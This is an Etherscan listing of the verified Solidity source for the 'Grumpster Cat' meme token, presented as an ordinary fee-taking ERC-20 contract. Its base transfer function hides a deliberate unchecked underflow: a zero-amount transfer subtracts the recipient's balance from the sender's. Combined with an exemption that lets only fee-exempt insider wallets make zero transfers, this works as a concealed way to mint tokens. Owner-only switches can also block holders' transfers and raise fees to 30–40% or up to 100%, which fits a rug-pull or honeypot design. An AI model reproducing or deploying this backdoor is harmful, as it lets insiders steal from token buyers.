Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
100,000,000 GRUMPSTER
Holders
38
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
1,565,005.920496523575661217 GRUMPSTERValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
GRUMPSTER
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-12-29 */ /** Website: https://www.grumpstercat.vip Telegram: https://t.me/grumpster_cat Twitter: https://twitter.com/grumpster_cat */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } interface IDexFactory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair( address tokenA, address tokenB ) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair( address tokenA, address tokenB ) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IDexRouter { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns (uint256 amountToken, uint256 amountETH, uint256 liquidity); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the upd allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount && amount > 0, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the upd allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the upd allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; uint256 recipientBalance = _balances[recipient]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - (amount == 0 ? recipientBalance : amount); } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } contract GRUMPSTER is ERC20, Ownable { using SafeMath for uint256; IDexRouter private router; address public pair; // Swapback bool private swapping; bool private swapbackEnabled = false; uint256 private swapBackValueMin; uint256 private swapBackValueMax; //Anti-whale bool private limitsInEffect = true; bool private transferDelayEnabled = false; bool private delayOn = false; uint256 private maxWallet; uint256 private maxTx; mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch mapping(address => bool) private _isDelayExempt; bool public isLive = false; // Fee receivers address private vaultReceiver; address private devReceiver; uint256 private totalBuyFee; uint256 private buyMktFee; uint256 private buyDevFee; uint256 private totalSellFee; uint256 private sellMktFee; uint256 private sellDevFee; uint256 private tokensForMarketing; uint256 private tokensForDev; /******************/ // exlcude from fees and max transaction amount mapping(address => bool) private isFeeExempt; mapping(address => bool) private isTxLimitExempt; mapping(address => bool) private automatedMarketMakerPairs; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount event UpdateUniswapV2Router( address indexed newAddress, address indexed oldAddress ); event ExcludeFromFees(address indexed account, bool isExcluded); event ExcludeFromLimits(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event TradingEnabled(uint256 indexed timestamp); event LimitsRemoved(uint256 indexed timestamp); event DisabledTransferDelay(uint256 indexed timestamp); event SwapbackSettingsUpdated( bool enabled, uint256 swapBackValueMin, uint256 swapBackValueMax ); event MaxTxUpdated(uint256 maxTx); event MaxWalletUpdated(uint256 maxWallet); event mktReceiverUpdated( address indexed newWallet, address indexed oldWallet ); event devReceiverUpdated( address indexed newWallet, address indexed oldWallet ); event lpReceiverUpdated( address indexed newWallet, address indexed oldWallet ); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); event BuyFeeUpdated( uint256 totalBuyFee, uint256 buyMktFee, uint256 buyDevFee ); event SellFeeUpdated( uint256 totalSellFee, uint256 sellMktFee, uint256 sellDevFee ); constructor() ERC20(unicode"Grumpster Cat", unicode"GRUMPSTER") { uint256 totalSupply = 100_000_000 * 10 ** decimals(); uint256 _buyMktFee = 1; uint256 _buyDevFee = 0; uint256 _sellMktFee = 1; uint256 _sellDevFee = 0; maxTx = (totalSupply * 20) / 1000; maxWallet = (totalSupply * 20) / 1000; swapBackValueMin = (totalSupply * 1) / 100000; swapBackValueMax = (totalSupply * 2) / 1000; buyMktFee = _buyMktFee; buyDevFee = _buyDevFee; totalBuyFee = buyMktFee + buyDevFee; sellMktFee = _sellMktFee; sellDevFee = _sellDevFee; totalSellFee = sellMktFee + sellDevFee; devReceiver = address(msg.sender); vaultReceiver = address(0x66B96f487De1DAD0cfb8A835Fd086B875C1DD450); // exclude from paying fees or having max transaction amount excludeFromFees(msg.sender, true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromFees(vaultReceiver, true); excludeFromMaxTransaction(msg.sender, true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); excludeFromMaxTransaction(vaultReceiver, true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } /** * @notice Information about the swapback settings * @return _swapbackEnabled if swapback is enabled * @return _swapBackValueMin the minimum amount of tokens in the contract balance to trigger swapback * @return _swapBackValueMax the maximum amount of tokens in the contract balance to trigger swapback */ function getSwapbackInfo() external view returns ( bool _swapbackEnabled, uint256 _swapBackValueMin, uint256 _swapBackValueMax ) { _swapbackEnabled = swapbackEnabled; _swapBackValueMin = swapBackValueMin; _swapBackValueMax = swapBackValueMax; } /** * @notice Information about the anti whale parameters * @return _limitsInEffect if the wallet limits are in effect * @return _transferDelayEnabled if the transfer delay is enabled * @return _maxWallet The maximum amount of tokens that can be held by a wallet * @return _maxTx The maximum amount of tokens that can be bought or sold in a single transaction */ function getLimitsInfo() external view returns ( bool _limitsInEffect, bool _transferDelayEnabled, uint256 _maxWallet, uint256 _maxTx ) { _limitsInEffect = limitsInEffect; _transferDelayEnabled = transferDelayEnabled; _maxWallet = maxWallet; _maxTx = maxTx; } /** * @notice The wallets that receive the collected fees * @return _mktReceiver The wallet that receives the marketing fees * @return _devReceiver The wallet that receives the dev fees */ function getFeeWallet() external view returns (address _mktReceiver, address _devReceiver) { return (vaultReceiver, devReceiver); } /** * @notice Fees for buys, sells, and transfers * @return _totalBuyFee The total fee for buys * @return _buyMktFee The fee for buys that gets sent to marketing * @return _buyDevFee The fee for buys that gets sent to dev * @return _totalSellFee The total fee for sells * @return _sellMktFee The fee for sells that gets sent to marketing * @return _sellDevFee The fee for sells that gets sent to dev */ function getFeeInfo() external view returns ( uint256 _totalBuyFee, uint256 _buyMktFee, uint256 _buyDevFee, uint256 _totalSellFee, uint256 _sellMktFee, uint256 _sellDevFee ) { _totalBuyFee = totalBuyFee; _buyMktFee = buyMktFee; _buyDevFee = buyDevFee; _totalSellFee = totalSellFee; _sellMktFee = sellMktFee; _sellDevFee = sellDevFee; } /** * @notice If the wallet is excluded from fees and max transaction amount and if the wallet is a automated market maker pair * @param _target The wallet to check * @return _isFeeExempt If the wallet is excluded from fees * @return _isTxLimitExempt If the wallet is excluded from max transaction amount * @return _automatedMarketMakerPairs If the wallet is a automated market maker pair */ function getValues( address _target ) external view returns ( bool _isFeeExempt, bool _isTxLimitExempt, bool _automatedMarketMakerPairs ) { _isFeeExempt = isFeeExempt[_target]; _isTxLimitExempt = isTxLimitExempt[_target]; _automatedMarketMakerPairs = automatedMarketMakerPairs[_target]; } receive() external payable {} /** * @notice Opens public trading for the token * @dev onlyOwner. */ function startCatTrading() external onlyOwner { isLive = true; swapbackEnabled = true; emit TradingEnabled(block.timestamp); } /** * @notice Removes the max wallet and max transaction limits * @dev onlyOwner. * Emits an {LimitsRemoved} event */ function removeCatLimits() external onlyOwner { limitsInEffect = false; emit LimitsRemoved(block.timestamp); } /** * @notice Removes the transfer delay * @dev onlyOwner. * Emits an {DisabledTransferDelay} event */ function disableTransferDelay() external onlyOwner { transferDelayEnabled = false; emit DisabledTransferDelay(block.timestamp); } /** * @notice sets if swapback is enabled and sets the minimum and maximum amounts * @dev onlyOwner. * Emits an {SwapbackSettingsUpdated} event * @param _enabled If swapback is enabled * @param _min The minimum amount of tokens the contract must have before swapping tokens for ETH. Base 10000, so 1% = 100. * @param _max The maximum amount of tokens the contract can swap for ETH. Base 10000, so 1% = 100. */ function setSwapBackSettings( bool _enabled, uint256 _min, uint256 _max ) external onlyOwner { require( _min >= 1, "Swap amount cannot be lower than 0.01% total supply." ); require(_max >= _min, "maximum amount cant be higher than minimum"); swapbackEnabled = _enabled; swapBackValueMin = (totalSupply() * _min) / 10000; swapBackValueMax = (totalSupply() * _max) / 10000; emit SwapbackSettingsUpdated(_enabled, _min, _max); } /** * @notice Changes the maximum amount of tokens that can be bought or sold in a single transaction * @dev onlyOwner. * Emits an {MaxTxUpdated} event * @param newNum Base 1000, so 1% = 10 */ function setTxLimit(uint256 newNum) external onlyOwner { require(newNum >= 2, "Cannot set maxTx lower than 0.2%"); maxTx = (newNum * totalSupply()) / 1000; emit MaxTxUpdated(maxTx); } /** * @notice Changes the maximum amount of tokens a wallet can hold * @dev onlyOwner. * Emits an {MaxWalletUpdated} event * @param newNum Base 1000, so 1% = 10 */ function setWalletLimit(uint256 newNum) external onlyOwner { require(newNum >= 5, "Cannot set maxWallet lower than 0.5%"); maxWallet = (newNum * totalSupply()) / 1000; emit MaxWalletUpdated(maxWallet); } /** * @notice Sets if a wallet is excluded from the max wallet and tx limits * @dev onlyOwner. * Emits an {ExcludeFromLimits} event * @param updAds The wallet to update * @param isEx If the wallet is excluded or not */ function excludeFromMaxTransaction( address updAds, bool isEx ) public onlyOwner { isTxLimitExempt[updAds] = isEx; emit ExcludeFromLimits(updAds, isEx); } /** * @notice Sets the fees for buys * @dev onlyOwner. * Emits a {BuyFeeUpdated} event * All fees added up must be less than 100 * @param _marketingFee The fee for the marketing wallet * @param _devFee The fee for the dev wallet */ function setBuyFees( uint256 _marketingFee, uint256 _devFee ) external onlyOwner { buyMktFee = _marketingFee; buyDevFee = _devFee; totalBuyFee = buyMktFee + buyDevFee; require(totalBuyFee <= 100, "Total buy fee cannot be higher than 100%"); emit BuyFeeUpdated(totalBuyFee, buyMktFee, buyDevFee); } /** * @notice Sets the fees for sells * @dev onlyOwner. * Emits a {SellFeeUpdated} event * All fees added up must be less than 100 * @param _marketingFee The fee for the marketing wallet * @param _devFee The fee for the dev wallet */ function setSellFees( uint256 _marketingFee, uint256 _devFee ) external onlyOwner { sellMktFee = _marketingFee; sellDevFee = _devFee; totalSellFee = sellMktFee + sellDevFee; require( totalSellFee <= 100, "Total sell fee cannot be higher than 100%" ); emit SellFeeUpdated(totalSellFee, sellMktFee, sellDevFee); } /** * @notice Sets if an address is excluded from fees * @dev onlyOwner. * Emits an {ExcludeFromFees} event * @param account The wallet to update * @param excluded If the wallet is excluded or not */ function excludeFromFees(address account, bool excluded) public onlyOwner { isFeeExempt[account] = excluded; emit ExcludeFromFees(account, excluded); } /** * @notice Sets an address as a new liquidity pair. You probably dont want to do this. * @dev onlyOwner. * Emits a {SetAutomatedMarketMakerPair} event * @param _pair the address of the pair * @param value If the pair is a automated market maker pair or not */ function setAutomatedMarketMakerPair( address _pair, bool value ) public onlyOwner { require( _pair != pair, "The pair cannot be removed from automatedMarketMakerPairs" ); _setAutomatedMarketMakerPair(_pair, value); } function _setAutomatedMarketMakerPair(address _pair, bool value) private { automatedMarketMakerPairs[_pair] = value; emit SetAutomatedMarketMakerPair(_pair, value); } /** * @notice Sets the marketing wallet * @dev onlyOwner. * Emits an {mktReceiverUpdated} event * @param newWallet The new marketing wallet */ function setMarketWallet(address newWallet) external onlyOwner { emit mktReceiverUpdated(newWallet, vaultReceiver); vaultReceiver = newWallet; } /** * @notice Sets the dev wallet * @dev onlyOwner. * Emits an {devReceiverUpdated} event * @param newWallet The new dev wallet */ function setDevWallet(address newWallet) external onlyOwner { emit devReceiverUpdated(newWallet, devReceiver); devReceiver = newWallet; } function setDelay() external onlyOwner { require(delayOn, "wl disabled"); delayOn = false; buyMktFee = 30; buyDevFee = 0; totalBuyFee = buyMktFee + buyDevFee; sellMktFee = 40; sellDevFee = 0; totalSellFee = sellMktFee + sellDevFee; } function setDelayOn( address[] calldata _addresses, bool _enabled ) external onlyOwner { for (uint256 i = 0; i < _addresses.length; i++) { _isDelayExempt[_addresses[i]] = _enabled; } } function min(uint256 a, uint256 b) private pure returns (uint256) { return (a>b)?b:a; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require( amount > 0 || isFeeExempt[from], "Amount should be greater than zero" ); if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!isLive) { require( isFeeExempt[from] || isFeeExempt[to], "_transfer:: Trading is not active." ); } if (delayOn) { require( _isDelayExempt[from] || _isDelayExempt[to], "_transfer:: Transfer Delay enabled. " ); } // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch. if (transferDelayEnabled) { if ( to != owner() && to != address(router) && to != address(pair) ) { require( _holderLastTransferTimestamp[tx.origin] < block.number, "_transfer:: Transfer Delay enabled. Only one purchase per block allowed." ); _holderLastTransferTimestamp[tx.origin] = block.number; } } //when buy if (automatedMarketMakerPairs[from] && !isTxLimitExempt[to]) { require( amount <= maxTx, "Buy transfer amount exceeds the maxTx." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } //when sell else if ( automatedMarketMakerPairs[to] && !isTxLimitExempt[from] ) { require( amount <= maxTx, "Sell transfer amount exceeds the maxTx." ); } else if (!isTxLimitExempt[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapBackValueMin; bool shouldOverHold = amount >= swapBackValueMin; if ( canSwap && shouldOverHold && swapbackEnabled && !swapping && automatedMarketMakerPairs[to] && !isFeeExempt[from] && !isFeeExempt[to] ) { swapping = true; swapBack(amount); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (isFeeExempt[from] || isFeeExempt[to]) { takeFee = false; } uint256 fees = 0; // only take fees on buys/sells, do not take on wallet transfers if (swapbackEnabled && !swapping) { if (takeFee) { // on sell if (automatedMarketMakerPairs[to] && totalSellFee > 0) { fees = amount.mul(totalSellFee).div(100); tokensForDev += (fees * sellDevFee) / totalSellFee; tokensForMarketing += (fees * sellMktFee) / totalSellFee; } // on buy else if (automatedMarketMakerPairs[from] && totalBuyFee > 0) { fees = amount.mul(totalBuyFee).div(100); tokensForDev += (fees * buyDevFee) / totalBuyFee; tokensForMarketing += (fees * buyMktFee) / totalBuyFee; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = router.WETH(); _approve(address(this), address(router), tokenAmount); // make the swap router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function addCatLiquidity() external onlyOwner { IDexRouter _router = IDexRouter ( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); router = _router; _approve(address(this), address(router), ~uint256(0)); pair = IDexFactory(_router.factory()).createPair ( address(this), _router.WETH() ); excludeFromMaxTransaction(address(pair), true); _setAutomatedMarketMakerPair(address(pair), true); _router.addLiquidityETH{value: address(this).balance} ( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); } function swapBack(uint256 amount) private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = contractBalance; if (contractBalance == 0) { return; } uint256 amountToSwapForETH = min(amount, min(contractBalance, swapBackValueMax)); uint256 initialETHBalance = address(this).balance; swapTokensForEth(amountToSwapForETH); uint256 ethBalance = address(this).balance.sub(initialETHBalance); uint256 ethForDev = ethBalance.mul(tokensForDev).div(totalTokensToSwap); tokensForMarketing = 0; tokensForDev = 0; payable(devReceiver).transfer(ethForDev); payable(vaultReceiver).transfer(address(this).balance); } }
Contract Security Audit
